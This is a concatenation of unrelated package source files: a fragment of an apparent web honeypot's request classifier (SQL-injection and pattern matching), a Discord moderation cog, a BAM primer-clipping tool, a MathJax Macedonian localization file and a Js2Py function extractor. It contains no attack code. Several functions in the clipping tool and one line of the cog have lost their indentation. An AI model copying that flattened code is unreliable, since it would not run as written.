        if not os.path.isdir(self.server_files_path):
            # 0o770 octal notation also works on Python 2.6+.
            os.mkdir(self.server_files_path, 0o770)
        self.sqli_c = sql.SQLiClassifier()

    def get_patterns(self):
        """Return all <request> pattern elements from the XML tree."""
        patterns = self.tree.getElementsByTagName("request")
        return patterns

    def getText(self, nodelist):
        """Return the text of the first TEXT or CDATA child in *nodelist*."""
        rc = []
        for node in nodelist:
            if node.nodeType == node.TEXT_NODE or node.nodeType == node.CDATA_SECTION_NODE:
                rc.append(node.data)
                break
        return ''.join(rc)

    def parse_pattern(self, pattern):
        """Build a :class:`RequestPattern` from one <request> XML element."""
        pattern_id = self.getText(pattern.getElementsByTagName("id")[0].childNodes)
        pattern_string = self.getText(pattern.getElementsByTagName("patternString")[0].childNodes)
        pattern_description = pattern.getElementsByTagName("patternDescription")[0].childNodes[0].data
        pattern_module = pattern.getElementsByTagName("module")[0].childNodes[0].data
        parsed_pattern = RequestPattern(pattern_id, pattern_string,
                                        pattern_description, pattern_module)
        return parsed_pattern

    def select_pattern(self, matched_patterns):
        """Pick the module to report when several patterns matched."""
        # TODO: add some logic
        matched_pattern = matched_patterns[0]
        if len(matched_patterns) > 1:
            # Prefer a specific classification over a leading "unknown".
            if matched_patterns[0] == "unknown":
                matched_pattern = matched_patterns[1]
            else:
                matched_pattern = matched_patterns[0]
        return matched_pattern

    def file_exists(self, http_request):
        """Return True when the request path maps to a local sandbox file."""
        request_path = urlparse.urlparse(http_request.path).path
        requested_file = request_path.lstrip('/')
        if os.path.isfile(os.path.join(self.server_files_path, requested_file)):
            return True
        return False

    def classify_request(self, http_request):
        """Return the attack-module name that best describes *http_request*."""
        if self.file_exists(http_request):
            return "file_server"
        patterns = self.get_patterns()
        matched_patterns = []
        unquoted_url = urllib2.unquote(http_request.request_url)
        # SQLi early exit
        ret = self.sqli_c.classify(unquoted_url)
        if ret['sqli']:
            return "sqli"
        for pattern in patterns:
            match = None
            parsed_pattern = self.parse_pattern(pattern)
            re_pattern = re.compile(parsed_pattern.string, re.I)
            # TODO: Rules for specific method. We should add a tag in the
            # rule to identify which rule it applies.
            # And some forms would send data in GET and POST methods.
            if http_request.command == "GET":
                match = re_pattern.search(unquoted_url)
            elif http_request.command == "POST":
                match = re_pattern.search(unquoted_url)
                # Fixed: this used to test ``match == 'unknown'``, which is
                # never true for None or a match object, so POST bodies were
                # never searched; fall back to the body when the URL missed.
                if match is None:
                    match = re_pattern.search(http_request.request_body)
            elif http_request.command == "HEAD":
                parsed_pattern.module = 'head'
                match = True
            elif http_request.command == "TRACE":
                parsed_pattern.module = 'trace'
                match = True
            else:
                parsed_pattern.module = 'unknown'
                match = True
            if match is not None:
                matched_patterns.append(parsed_pattern.module)
        matched_pattern = self.select_pattern(matched_patterns)
        return matched_pattern
/Kr0nOs-3.4.1.tar.gz/Kr0nOs-3.4.1/kronbot/cogs/mod/mod.py | import asyncio
import logging
import re
from abc import ABC
from collections import defaultdict
from typing import List, Tuple
import discord
from kronbot.core import Config, commands, modlog
from kronbot.core.bot import Kron
from kronbot.core.i18n import Translator, cog_i18n
from kronbot.core.utils._internal_utils import send_to_owners_with_prefix_replaced
from .casetypes import CASETYPES
from .events import Events
from .kickban import KickBanMixin
from .mutes import MuteMixin
from .names import ModInfo
from .settings import ModSettings
from .slowmode import Slowmode
# Translator for user-facing strings in this cog; ``_`` and ``T_`` are
# two names for the same callable.
_ = T_ = Translator("Mod", __file__)
# Cog version; matches the newest Config schema version ("1.2.0").
__version__ = "1.2.0"
class CompositeMetaClass(type(commands.Cog), type(ABC)):
    """Metaclass combining discord.py's Cog metaclass with ABCMeta.

    This allows the metaclass used for proper type detection to coexist
    with discord.py's metaclass, so abstract mixin bases and
    ``commands.Cog`` can be inherited together without a metaclass
    conflict.
    """
@cog_i18n(_)
class Mod(
    ModSettings,
    Events,
    KickBanMixin,
    MuteMixin,
    ModInfo,
    Slowmode,
    commands.Cog,
    metaclass=CompositeMetaClass,
):
    """Moderation tools."""
    # Config schema defaults.  ``version`` records the last schema
    # migration applied by _maybe_update_config().
    default_global_settings = {"version": ""}
    # Per-guild defaults; -1 means "disabled" for the delay/repeat values.
    default_guild_settings = {
        "ban_mention_spam": False,
        "delete_repeats": -1,
        "ignored": False,
        "respect_hierarchy": True,
        "delete_delay": -1,
        "reinvite_on_unban": False,
        "current_tempbans": [],
        "dm_on_kickban": False,
        "default_days": 0,
    }
    default_channel_settings = {"ignored": False}
    default_member_settings = {"past_nicks": [], "perms_cache": {}, "banned_until": False}
    default_user_settings = {"past_names": []}
    def __init__(self, bot: Kron):
        """Register the Config schema and start the tempban expiry task."""
        super().__init__()
        self.bot = bot
        self.settings = Config.get_conf(self, 4961522000, force_registration=True)
        self.settings.register_global(**self.default_global_settings)
        self.settings.register_guild(**self.default_guild_settings)
        self.settings.register_channel(**self.default_channel_settings)
        self.settings.register_member(**self.default_member_settings)
        self.settings.register_user(**self.default_user_settings)
        self.cache: dict = {}
        # Background task that lifts tempbans once they expire.
        self.tban_expiry_task = self.bot.loop.create_task(self.check_tempban_expirations())
        self.last_case: dict = defaultdict(dict)
        # Set by initialize(); commands wait on it via cog_before_invoke().
        self._ready = asyncio.Event()
    async def initialize(self):
        """Run one-off setup (config migrations) and mark the cog ready."""
        await self._maybe_update_config()
        self._ready.set()
    async def cog_before_invoke(self, ctx: commands.Context) -> None:
        # Block command execution until initialize() has completed.
        await self._ready.wait()
    def cog_unload(self):
        # Stop the background tempban-expiry loop on unload.
        self.tban_expiry_task.cancel()
    async def _maybe_update_config(self):
        """Migrate Config values written by versions of Mod before the
        current schema; runs once per version bump."""
        if not await self.settings.version():
            # Pre-1.0.0: ``delete_repeats`` was stored as a boolean;
            # convert True to the new repeat count (3), False to disabled (-1).
            guild_dict = await self.settings.all_guilds()
            for guild_id, info in guild_dict.items():
                delete_repeats = info.get("delete_repeats", False)
                if delete_repeats:
                    val = 3
                else:
                    val = -1
                await self.settings.guild(discord.Object(id=guild_id)).delete_repeats.set(val)
            await self.settings.version.set("1.0.0")  # set version of last update
        # NOTE: versions are compared as plain strings, which orders the
        # "1.x.0" values used here correctly but would misorder e.g. "1.10.0".
        if await self.settings.version() < "1.1.0":
            msg = _(
                "Ignored guilds and channels have been moved. "
                "Please use `[p]moveignoredchannels` if "
                "you were previously using these functions."
            )
            self.bot.loop.create_task(send_to_owners_with_prefix_replaced(self.bot, msg))
            await self.settings.version.set("1.1.0")
        if await self.settings.version() < "1.2.0":
            msg = _(
                "Delete delay settings have been moved. "
                "Please use `[p]movedeletedelay` if "
                "you were previously using these functions."
            )
            self.bot.loop.create_task(send_to_owners_with_prefix_replaced(self.bot, msg))
            await self.settings.version.set("1.2.0")
    @commands.command()
    @commands.is_owner()
    async def moveignoredchannels(self, ctx: commands.Context) -> None:
        """Move ignored channels and servers to core"""
        # Copy each guild/channel "ignored" flag into the core bot config,
        # then clear the cog-local copy.
        all_guilds = await self.settings.all_guilds()
        all_channels = await self.settings.all_channels()
        for guild_id, settings in all_guilds.items():
            await self.bot._config.guild_from_id(guild_id).ignored.set(settings["ignored"])
            await self.settings.guild_from_id(guild_id).ignored.clear()
        for channel_id, settings in all_channels.items():
            await self.bot._config.channel_from_id(channel_id).ignored.set(settings["ignored"])
            await self.settings.channel_from_id(channel_id).clear()
        await ctx.send(_("Ignored channels and guilds restored."))
    @commands.command()
    @commands.is_owner()
    async def movedeletedelay(self, ctx: commands.Context) -> None:
        """
        Move deletedelay settings to core
        """
        # Copy each guild's delete_delay into the core bot config, then
        # clear the cog-local copy.
        all_guilds = await self.settings.all_guilds()
        for guild_id, settings in all_guilds.items():
            await self.bot._config.guild_from_id(guild_id).delete_delay.set(
                settings["delete_delay"]
            )
            await self.settings.guild_from_id(guild_id).delete_delay.clear()
await ctx.send(_("Delete delay settings restored.")) | PypiClean |
/Katana-0.1.1.tar.gz/Katana-0.1.1/katana/clipper.py | #TODO: elaborate module doc
#TODO: see TODO.rst
#TODO: Add to PyPI
## Copyright 2014 Bioinformatics Core, University of Michigan
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
from __future__ import print_function, absolute_import, division
import argparse
import csv
from datetime import datetime
import resource
import sys
import time
import traceback
import pysam
import katana
import katana.cigar as cigar
import katana.readhandler as readhandler
from katana.util import KatanaException, PrimerStats, PrimerStatsDumper, \
PrimerPair, Read, ReadTransformation
__version__ = katana.__version__
# Long-form help text used as the argparse description (see
# _parse_command_line_args).
DESCRIPTION=\
'''Match each alignment in input BAM to primer, softclipping the primer region.
Katana matches each read to its corresponding primer pair based on start
position of the read. Katana then soft-clips the primer region from the edge of
the read sequence, rescuing the signal of true variants measured by overlapping
amplicons. The output is conceptually similar to hard-clipping the primers from
the original FASTQ reads based on sequence identity but with the advantage that
retaining the primers during alignment improves alignment quality.
'''
class _KatanaUsageError(Exception):
"""Raised for malformed command or invalid arguments."""
def __init__(self, msg, *args):
super(_KatanaUsageError, self).__init__(msg, *args)
class _KatanaArgumentParser(argparse.ArgumentParser):
    """ArgumentParser variant that reports problems by raising
    _KatanaUsageError instead of printing usage and exiting."""
    #pylint: disable=too-few-public-methods
    def error(self, message):
        """Override argparse's default exit-on-error behavior."""
        raise _KatanaUsageError(message)
#TODO: make this a logger object that writes to file and console and
# supports debug and info calls
def _log(msg_format, *args):
timestamp = datetime.now().strftime('%Y/%m/%d %H:%M:%S')
try:
print("{}|{}".format(timestamp, msg_format).format(*args),
file=sys.stderr)
except IndexError:
print(args)
sys.stderr.flush()
def _filter_builder(read_transformation):
filters = []
if read_transformation.is_unmapped:
filters.append("UNMAPPED_ALIGNMENT")
else:
if read_transformation.primer_pair.is_unmatched:
filters.append("UNMATCHED_PRIMER_PAIR")
if not read_transformation.is_cigar_valid:
filters.append("INVALID_CIGAR")
return filters
#TODO: refactor to expedite testing (e.g. clipped_cigar_provider,
# cached_clipped_cigar_provider)
def _build_read_transformations(read_iter, filter_builder):
    """Map each read key to its ReadTransformation (soft-clipped cigar).

    Reads sharing the same (primer pair, start, cigar string) reuse one
    cached clipped cigar instead of recomputing the clip.

    Raises:
        KatanaException: wraps any per-read failure with the read name,
        input line number and primer-pair id for easier debugging.
    """
    read_transformations = {}
    read_count = 0
    cigar_cache = {}
    for read in read_iter:
        primer_pair = None
        try:
            read_count += 1
            primer_pair = PrimerPair.get_primer_pair(read)
            key = (primer_pair, read.reference_start, read.cigarstring)
            # BUG FIX: use a membership test instead of ``.get(key)`` so a
            # falsy cached cigar is not silently recomputed on every read.
            if key not in cigar_cache:
                old_cigar = cigar.cigar_factory(read)
                cigar_cache[key] = primer_pair.softclip_primers(old_cigar)
            new_cigar = cigar_cache[key]
            transform = ReadTransformation(read,
                                           primer_pair,
                                           new_cigar,
                                           filter_builder)
            read_transformations[read.key] = transform
        except Exception as exception:
            # BUG FIX: primer_pair was referenced while unbound here when
            # get_primer_pair() itself raised, masking the real error with
            # an UnboundLocalError.
            if primer_pair is not None:
                target_id = primer_pair.target_id
            else:
                target_id = "unknown"
            msg = "Problem with read {} [line {}] and primer pair {}: {}"
            raise KatanaException(msg.format(read.query_name,
                                             read_count,
                                             target_id,
                                             exception))
    _log("Built transforms for [{}] alignments", read_count)
    return read_transformations
def _handle_reads(read_handlers, read_iter, read_transformations):
    """Push every read through each handler in order, bracketed by
    begin()/end() calls on all handlers."""
    for handler in read_handlers:
        handler.begin()
    for read in read_iter:
        transform = read_transformations[read.key]
        # Mates that were never transformed fall back to the NULL transform.
        mate_transform = read_transformations.get(read.mate_key,
                                                  ReadTransformation.NULL)
        try:
            for handler in read_handlers:
                handler.handle(read, transform, mate_transform)
        except StopIteration:
            # A handler raises StopIteration to skip the remaining
            # handlers for this particular read.
            pass
    for handler in read_handlers:
        handler.end()
def _initialize_primer_pairs(base_reader):
    """Register a PrimerPair for every row of the tab-separated manifest.

    Sense start positions are shifted from the manifest's 1-based
    coordinates to 0-based ones; end positions are derived from the
    primer sequence lengths.
    """
    for row in csv.DictReader(base_reader, delimiter='\t'):
        sense_start = int(row["Sense Start"]) - 1
        sense_end = sense_start + len(row["Sense Sequence"])
        antisense_start = int(row["Antisense Start"])
        antisense_end = antisense_start - len(row["Antisense Sequence"])
        PrimerPair(row["Customer TargetID"],
                   "chr" + row["Chr"],  #TODO: this prefix seems hackish?
                   (sense_start, sense_end),
                   (antisense_end, antisense_start))
def _build_handlers(input_bam_filename,
                    output_bam_filename,
                    include_unmatched_reads):
    """Assemble the ordered read-handler pipeline.

    The exclusion handler (which drops non-matched reads) is left out of
    the pipeline when *include_unmatched_reads* is truthy.
    """
    stats = readhandler.StatsHandler(PrimerStats(),
                                     PrimerStatsDumper(log_method=_log))
    exclude = readhandler.ExcludeNonMatchedReadHandler(log_method=_log)
    tag = readhandler.AddTagsReadHandler()
    transform = readhandler.TransformReadHandler()
    write = readhandler.WriteReadHandler(input_bam_filename,
                                         output_bam_filename,
                                         log_method=_log)
    if include_unmatched_reads:
        return [stats, tag, transform, write]
    return [stats, tag, transform, exclude, write]
def _parse_command_line_args(arguments):
    """Parse *arguments* (``sys.argv[1:]`` style) into a Namespace.

    Raises _KatanaUsageError (via _KatanaArgumentParser.error) on
    malformed input instead of exiting the process.
    """
    parser = _KatanaArgumentParser( \
        formatter_class=argparse.RawTextHelpFormatter,
        usage="katana primer_manifest input_bam output_bam",
        description=(DESCRIPTION))
    parser.add_argument("-V",
                        "--version",
                        action='version',
                        version=__version__)
    parser.add_argument('primer_manifest',
                        help="path to primer manifest (tab-separated text)")
    parser.add_argument('input_bam',
                        help="path to input BAM")
    parser.add_argument('output_bam',
                        help="path to output BAM")
    parser.add_argument("--preserve_all_alignments",
                        action="store_true",
                        help=("Preserve all incoming alignments (even if they "
                              "are unmapped, cannot be matched with primers, "
                              "result in invalid CIGARs, etc.)"))
    args = parser.parse_args(arguments)
    return args
def _peak_memory():
peak_memory = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
peak_memory_mb = peak_memory/1024
if sys.platform == 'darwin':
peak_memory_mb /= 1024
return int(peak_memory_mb)
#TODO: test
#TODO: check input files exist
def main(command_line_args=None):
    '''Katana entry point: parse args, load the primer manifest, then
    transform and write the alignments.'''
    try:
        start_time = time.time()
        if not command_line_args:
            command_line_args = sys.argv
        args = _parse_command_line_args(command_line_args[1:])
        _log("Reading primer pairs from [{}]", args.primer_manifest)
        with open(args.primer_manifest, "r") as input_primer_manifest:
            _initialize_primer_pairs(input_primer_manifest)
        _log("Read [{}] primer pairs", len(PrimerPair._all_primers))
        # Pre-bind so the finally-block can test it even if opening fails.
        input_bamfile = None
        _log("Building transformations from BAM [{}]", args.input_bam)
        #pylint: disable=no-member
        input_bamfile = pysam.AlignmentFile(args.input_bam,"rb")
        # First pass over the BAM: compute a transformation per alignment.
        aligned_segment_iter = input_bamfile.fetch()
        read_iter = Read.iter(aligned_segment_iter, input_bamfile)
        read_transformations = _build_read_transformations(read_iter,
                                                           _filter_builder)
        _log("Writing transformed alignments to [{}]", args.output_bam)
        handlers = _build_handlers(args.input_bam,
                                   args.output_bam,
                                   args.preserve_all_alignments)
        # Second pass: re-read the BAM and push each read through the
        # handler pipeline using the transformations from pass one.
        aligned_segment_iter = input_bamfile.fetch()
        read_iter = Read.iter(aligned_segment_iter, input_bamfile)
        _handle_reads(handlers, read_iter, read_transformations)
        elapsed_time = int(time.time() - start_time)
        _log("Done ({} seconds, {}mb peak memory)",
             elapsed_time,
             _peak_memory())
    except _KatanaUsageError as usage_error:
        # Bad command line: short message and exit code 1.
        message = "katana usage problem: {}".format(str(usage_error))
        print(message, file=sys.stderr)
        print("See 'katana --help'.", file=sys.stderr)
        sys.exit(1)
    except Exception: #pylint: disable=broad-except
        _log("ERROR: An unexpected error occurred")
        _log(traceback.format_exc())
        exit(1)
    finally:
        try:
            if input_bamfile:
                input_bamfile.close()
        except NameError:
            # input_bamfile is unbound if an exception fired before it
            # was assigned (e.g. a usage error during argument parsing).
            pass
if __name__ == '__main__':
#import cProfile
#cProfile.run('main()')
main(sys.argv) | PypiClean |
/Mathics_Django-6.0.0-py3-none-any.whl/mathics_django/web/media/js/mathjax/localization/mk/FontWarnings.js | MathJax.Localization.addTranslation("mk","FontWarnings",{version:"2.7.9",isLoaded:true,strings:{webFont:"MathJax \u043A\u043E\u0440\u0438\u0441\u0442\u0438 \u043C\u0440\u0435\u0436\u043D\u0438 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u0437\u0430 \u0438\u0441\u043F\u0438\u0441 \u043D\u0430 \u043C\u0430\u0442\u0435\u043C\u0430\u0442\u0438\u0447\u043A\u0438\u0442\u0435 \u0441\u043E\u0434\u0440\u0436\u0438\u043D\u0438 \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430. \u041D\u0430 \u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u0438\u043C \u0442\u0440\u0435\u0431\u0430 \u0432\u0440\u0435\u043C\u0435 \u0434\u0430 \u0441\u0435 \u0432\u0447\u0438\u0442\u0430\u0430\u0442, \u043F\u0430 \u0442\u0430\u043A\u0430, \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0442\u0430 \u0431\u0438 \u0441\u0435 \u043F\u0440\u0438\u043A\u0430\u0436\u0430\u043B\u0430 \u043F\u043E\u0431\u0440\u0433\u0443 \u0434\u043E\u043A\u043E\u043B\u043A\u0443 \u0433\u0438 \u043F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u043D\u0435\u043F\u043E\u0441\u0440\u0435\u0434\u043D\u043E \u0432\u043E \u0441\u0438\u0441\u0442\u0435\u043C\u0441\u043A\u0430\u0442\u0430 \u043F\u0430\u043F\u043A\u0430 \u0437\u0430 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u043D\u0430 \u0432\u0430\u0448\u0438\u043E\u0442 \u0441\u043C\u0435\u0442\u0430\u0447.",imageFonts:"MathJax \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 \u043D\u0435\u0433\u043E\u0432\u0438\u0442\u0435 \u0441\u043B\u0438\u043A\u043E\u0432\u043D\u0438 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u043D\u0430\u043C\u0435\u0441\u0442\u043E \u043D\u0438\u0432\u043D\u0438\u0442\u0435 \u043C\u0435\u0441\u043D\u0438 \u0438\u043B\u0438 \u043C\u0440\u0435\u0436\u043D\u0438 \u043F\u0430\u043D\u0434\u0430\u043D\u0438. 
\u041E\u0432\u0438\u0435 \u0441\u0435 \u043F\u0440\u0438\u043A\u0430\u0436\u0443\u0432\u0430\u0430\u0442 \u043F\u043E\u0431\u0430\u0432\u043D\u043E \u0438 \u043C\u0430\u0442\u0435\u043C\u0430\u0442\u0438\u0447\u043A\u0438\u0442\u0435 \u0441\u043E\u0434\u0440\u0436\u0438\u043D\u0438 \u043C\u043E\u0436\u0435 \u0434\u0430 \u043D\u0435 \u0441\u0435 \u043F\u043E\u0433\u043E\u0434\u043D\u0438 \u0437\u0430 \u043F\u0435\u0447\u0430\u0442\u0435\u045A\u0435 \u043F\u0440\u0438 \u043F\u043E\u043B\u043D\u0430 \u0440\u0430\u0437\u0434\u0435\u043B\u0435\u043D\u0430 \u043C\u043E\u045C \u043D\u0430 \u0432\u0430\u0448\u0438\u043E\u0442 \u043F\u0435\u0447\u0430\u0442\u0430\u0440.",noFonts:"MathJax \u043D\u0435 \u043C\u043E\u0436\u0435 \u0434\u0430 \u0433\u043E \u043D\u0430\u0458\u0434\u0435 \u0444\u043E\u043D\u0442\u043E\u0442 \u0437\u0430 \u043F\u0440\u0438\u043A\u0430\u0437 \u043D\u0430 \u043C\u0430\u0442\u0435\u043C\u0430\u0442\u0438\u0447\u043A\u0438\u0442\u0435 \u0441\u043E\u0434\u0440\u0436\u0438\u043D\u0438, \u0430 \u043D\u0435 \u043C\u0443 \u0441\u0435 \u0434\u043E\u0441\u0442\u0430\u043F\u043D\u0438 \u043D\u0438 \u0441\u043B\u0438\u043A\u043E\u0432\u043D\u0438 \u0444\u043E\u043D\u0442\u043E\u0432\u0438, \u0448\u0442\u043E \u0437\u043D\u0430\u0447\u0438 \u0434\u0435\u043A\u0430 \u043C\u043E\u0440\u0430 \u0434\u0430 \u0441\u0435 \u043F\u043E\u0442\u043F\u0440\u0435 \u043D\u0430 \u043E\u043F\u0448\u0442\u043E\u043D\u0430\u043C\u0435\u043D\u0441\u043A\u0438\u0442\u0435 \u0443\u043D\u0438\u043A\u043E\u0434\u043D\u0438 \u0437\u043D\u0430\u0446\u0438, \u0441\u043E \u043D\u0430\u0434\u0435\u0436 \u0434\u0435\u043A\u0430 \u0432\u0430\u0448\u0438\u043E\u0442 \u043F\u0440\u0435\u043B\u0438\u0441\u0442\u0443\u0432\u0430\u0447 \u045C\u0435 \u043C\u043E\u0436\u0435 \u0434\u0430 \u0433\u0438 \u043F\u0440\u0438\u043A\u0430\u0436\u0435. 
\u041D\u0435\u043A\u043E\u0438 \u0437\u043D\u0430\u0446\u0438 \u043C\u043E\u0436\u0435 \u0434\u0430 \u043D\u0435 \u0441\u0435 \u043F\u0440\u0438\u043A\u0430\u0436\u0430\u0442 \u043A\u0430\u043A\u043E \u0448\u0442\u043E \u0442\u0440\u0435\u0431\u0430 \u0438\u043B\u0438 \u043F\u0430\u043A \u0432\u043E\u043E\u043F\u0448\u0442\u043E \u043D\u0435\u043C\u0430 \u0434\u0430 \u0441\u0435 \u043F\u043E\u0458\u0430\u0432\u0430\u0442.",webFonts:"\u041D\u0430\u0458\u0432\u0435\u045C\u0435\u0442\u043E \u0441\u043E\u0432\u0440\u0435\u043C\u0435\u043D\u0438 \u043F\u0440\u0435\u043B\u0438\u0441\u0442\u0443\u0432\u0430\u0447\u0438 \u043E\u0432\u043E\u0437\u043E\u043C\u043E\u0436\u0443\u0432\u0430\u0430\u0442 \u043F\u0440\u0435\u0437\u0435\u043C\u0430\u045A\u0435 \u043D\u0430 \u0444\u043E\u043D\u0442\u043E\u0432\u0438 \u043E\u0434 \u0441\u0435\u043C\u0440\u0435\u0436\u0458\u0435\u0442\u043E. \u041A\u0432\u0430\u043B\u0438\u0442\u0435\u0442\u043E\u0442 \u043D\u0430 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430 \u043C\u043E\u0436\u0435 \u0434\u0430 \u0441\u0435 \u043F\u043E\u0434\u043E\u0431\u0440\u0438 \u0430\u043A\u043E \u043F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u043F\u043E\u043D\u043E\u0432\u0430 \u0432\u0435\u0440\u0437\u0438\u0458\u0430 \u043D\u0430 \u043F\u0440\u0435\u043B\u0438\u0441\u0442\u0443\u0432\u0430\u0447\u043E\u0442 (\u0438\u043B\u0438 \u043F\u0430\u043A \u0433\u043E \u0437\u0430\u043C\u0435\u043D\u0438\u0442\u0435 \u0441\u043E \u0434\u0440\u0443\u0433).",fonts:"MathJax \u043C\u043E\u0436\u0435 \u0434\u0430 \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 [\u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u043D\u0430 STIX](%1) \u0438\u043B\u0438 [\u043E\u043D\u0438\u0435 \u043D\u0430 MathJax TeX](%2). 
\u041F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u0433\u0438 \u0438 \u0432\u043E\u0441\u043F\u043E\u0441\u0442\u0430\u0432\u0435\u0442\u0435 \u0433\u0438 \u0437\u0430 \u0434\u0430 \u0433\u043E \u043F\u043E\u0434\u043E\u0431\u0440\u0438\u0442\u0435 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 MathJax \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0438\u0442\u0435.",STIXPage:"\u0421\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430 \u0435 \u043F\u0440\u0435\u0434\u0432\u0438\u0434\u0435\u043D\u0430 \u0434\u0430 \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 [\u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u043D\u0430 STIX](%1). \u041F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u0433\u0438 \u0438 \u0432\u043E\u0441\u043F\u043E\u0441\u0442\u0430\u0432\u0435\u0442\u0435 \u0433\u0438 \u0437\u0430 \u0434\u0430 \u0433\u043E \u043F\u043E\u0434\u043E\u0431\u0440\u0438\u0442\u0435 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 MathJax \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0438\u0442\u0435.",TeXPage:"\u0421\u0442\u0440\u0430\u043D\u0438\u0446\u0430\u0432\u0430 \u0435 \u043F\u0440\u0435\u0434\u0432\u0438\u0434\u0435\u043D\u0430 \u0434\u0430 \u0433\u0438 \u043A\u043E\u0440\u0438\u0441\u0442\u0438 [\u0444\u043E\u043D\u0442\u043E\u0432\u0438\u0442\u0435 \u043D\u0430 MathJax TeX](%1). \u041F\u0440\u0435\u0437\u0435\u043C\u0435\u0442\u0435 \u0433\u0438 \u0438 \u0432\u043E\u0441\u043F\u043E\u0441\u0442\u0430\u0432\u0435\u0442\u0435 \u0433\u0438 \u0437\u0430 \u0434\u0430 \u0433\u043E \u043F\u043E\u0434\u043E\u0431\u0440\u0438\u0442\u0435 \u0438\u0441\u043F\u0438\u0441\u043E\u0442 \u043D\u0430 MathJax \u043D\u0430 \u0441\u0442\u0440\u0430\u043D\u0438\u0446\u0438\u0442\u0435."}});MathJax.Ajax.loadComplete("[MathJax]/localization/mk/FontWarnings.js"); | PypiClean |
/Js2Py-0.74.tar.gz/Js2Py-0.74/js2py/legecy_translators/functions.py | from __future__ import print_function
from jsparser import *
from utils import *
# Name template for placeholders that replace inline function
# expressions; %d is filled from the INLINE_COUNT counter.
INLINE_NAME = 'PyJsLvalInline%d_'
INLINE_COUNT = 0
# Keywords that can directly precede a function *expression*.
PRE_EXP_STARTS = {
    'return', 'new', 'void', 'throw', 'typeof', 'in', 'instanceof'
}
# Characters after which a following ``function`` keyword is treated as
# a function statement (declaration) rather than an expression.
PRE_ALLOWED = IDENTIFIER_PART.union({';', '{', '}', ']', ')', ':'})
INCREMENTS = {'++', '--'}
def reset_inline_count():
    """Reset the module-level INLINE_COUNT counter back to 0."""
    global INLINE_COUNT
    INLINE_COUNT = 0
def remove_functions(source, all_inline=False):
    """Strip JavaScript function definitions out of *source*.

    Returns ``(new_source, hoisted, inline)``:

    * ``hoisted`` maps a function name to ``(body, argnames)`` for
      function *statements* (removed from the output entirely);
    * ``inline`` maps a generated placeholder key (``'iname@realname'``)
      to ``(body, argnames)`` for function *expressions*, which are
      replaced in ``new_source`` by the generated placeholder name.

    With ``all_inline=True`` every function is treated as inline.
    """
    global INLINE_COUNT
    inline = {}
    hoisted = {}
    n = 0
    limit = len(source) - 9  # 'function' is 8 chars; -9 leaves room for one more char
    res = ''
    last = 0
    while n < limit:
        # Skip positions in the middle of an identifier (e.g. 'myfunction').
        if n and source[n - 1] in IDENTIFIER_PART:
            n += 1
            continue
        if source[n:n + 8] == 'function' and source[n +
                                                    8] not in IDENTIFIER_PART:
            if source[:n].rstrip().endswith(
                    '.'):  # allow function as a property name :)
                n += 1
                continue
            if source[n + 8:].lstrip().startswith(
                    ':'):  # allow functions inside objects...
                n += 1
                continue
            entered = n
            res += source[last:n]
            name = ''
            n = pass_white(source, n + 8)
            if source[n] in IDENTIFIER_START:  # hoisted function
                name, n = parse_identifier(source, n)
            args, n = pass_bracket(source, n, '()')
            if not args:
                raise SyntaxError('Function misses bracket with argnames ()')
            args = args.strip('() \n')
            args = tuple(parse_identifier(e, 0)[0]
                         for e in argsplit(args)) if args else ()
            if len(args) - len(set(args)):
                # I know its legal in JS but python does not allow duplicate argnames
                # I will not work around it
                raise SyntaxError(
                    'Function has duplicate argument names. Its not legal in this implementation. Sorry.'
                )
            block, n = pass_bracket(source, n, '{}')
            if not block:
                raise SyntaxError(
                    'Function does not have any code block to execute')
            mixed = False  # named function expression flag
            if name and not all_inline:
                # Here I will distinguish between named function expression (mixed) and a function statement
                before = source[:entered].rstrip()
                if any(endswith_keyword(before, e) for e in PRE_EXP_STARTS):
                    # Preceded by e.g. 'return'/'new' -> must be an expression.
                    #print 'Ended ith keyword'
                    mixed = True
                elif before and before[-1] not in PRE_ALLOWED and not before[
                        -2:] in INCREMENTS:
                    # Preceding char only legal before an expression.
                    #print 'Ended with'+repr(before[-1]), before[-1]=='}'
                    mixed = True
                else:
                    #print 'FUNCTION STATEMENT'
                    #its a function statement.
                    # todo remove fucking label if present!
                    hoisted[name] = block, args
            if not name or mixed or all_inline:  # its a function expression (can be both named and not named)
                #print 'FUNCTION EXPRESSION'
                INLINE_COUNT += 1
                iname = INLINE_NAME % INLINE_COUNT  # inline name
                res += ' ' + iname
                inline['%s@%s' % (
                    iname, name
                )] = block, args  #here added real name at the end because it has to be added to the func scope
            last = n
        else:
            n += 1
    res += source[last:]
    return res, hoisted, inline
if __name__ == '__main__':
print(remove_functions(
'5+5 function n (functiona ,functionaj) {dsd s, dsdd}')) | PypiClean |
